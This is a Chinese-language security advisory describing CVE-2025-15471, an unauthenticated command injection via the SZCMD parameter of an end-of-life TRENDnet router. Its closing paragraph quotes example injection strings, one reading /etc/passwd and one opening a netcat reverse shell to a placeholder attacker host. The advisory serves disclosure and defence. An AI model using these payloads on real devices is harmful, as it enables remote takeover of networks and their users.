CVE-2025-15471CVE-2025-15471是TRENDnet TEW-713RE路由器中发现的严重命令注入漏洞。该漏洞存在于路由器的Web管理界面文件/goform/formFSrvX中,攻击者可以通过SZCMD参数注入恶意OS命令。由于该漏洞CVSS评分高达9.8,属于严重级别,攻击者可以在无需任何认证的情况下远程执行任意系统命令,完全控制受影响设备。漏洞影响路由器的机密性、完整性和可用性,攻击者可窃取网络配置、植入后门或将其纳入僵尸网络。值得注意的是,该产品已于2020年10月23日停产,厂商不再提供安全更新,用户需自行采取防护措施。
该漏洞为典型的OS命令注入(Command Injection)问题。漏洞位于TRENDnet TEW-713RE路由器固件1.02版本的Web服务器组件中,具体在/goform/formFSrvX端点。攻击者通过HTTP请求的SZCMD参数注入恶意命令,服务器端未对用户输入进行充分的命令边界检查和过滤,直接将参数值传递给系统shell执行。由于路由器通常以root权限运行Web服务,攻击者可在设备上获得完全控制权。常见利用方式包括:使用分号、管道符或反引号等命令连接符注入额外命令,如';cat /etc/passwd'或'|nc -e /bin/sh attacker.com 4444'。成功利用后可执行任意代码、安装持久化后门或横向移动至内网其他设备。